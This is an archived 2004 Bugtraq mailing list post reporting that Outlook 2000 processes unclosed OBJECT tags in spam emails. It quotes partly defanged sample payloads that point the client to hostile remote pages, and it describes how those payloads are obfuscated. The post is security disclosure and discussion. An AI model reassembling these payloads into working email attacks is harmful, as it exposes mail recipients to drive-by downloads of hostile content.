lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 7 Jun 2004 16:15:47 -0400 From: "James C Slora Jr" <Jim.Slora@...a.com> To: <bugtraq@...urityfocus.com> Subject: OBJECT Bugs or Features Two questions about the recent OBJECT tag assault in spam messages: 1. Should an email client process an OBJECT tag that has no corresponding /OBJECT? 2. Should an email client process an OBJECT tag that is not even embedded within HTML tags? Apparently the current answer in Outlook is Yes. Two examples below leap to the Web to download very hostile pages from fully patched fully updated Outlook 2000. I have not tested in other versions, but the volume of the incoming spam with these tags suggests other versions are vulnerable too. I don't think this is new ground, but it is very much wild now. ~ inserted in key places to reduce "you sent me spam" notices. From: "Yesenia Edwards" <YMNUDEWDQHFZWU@...oo.com> To: <blah@...h.blah> Subject: the email from 2 days ago.. here is my replay.. Date: Mon, 07 Jun 2004 13:29:40 +0600 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="--6941203962437317574" ----6941203962437317574 Content-Type: text/html; Content-Transfer-Encoding: quoted-printable ~object data=3D"http://www.seductiveones.~biz/easy/orrorr/sock/page.~php"~=20 ----6941203962437317574-- Many other messages have Object tags that look like this: ~object = data=3D"http://www.= 19;ildwincasino= .net/page.php= ;"~ Note they mix "=" and "=3D" in addition to not closing the OBJECT tag. The hostile site URL is often obfuscated through ASCII HTML encoding.
Powered by blists - more mailing lists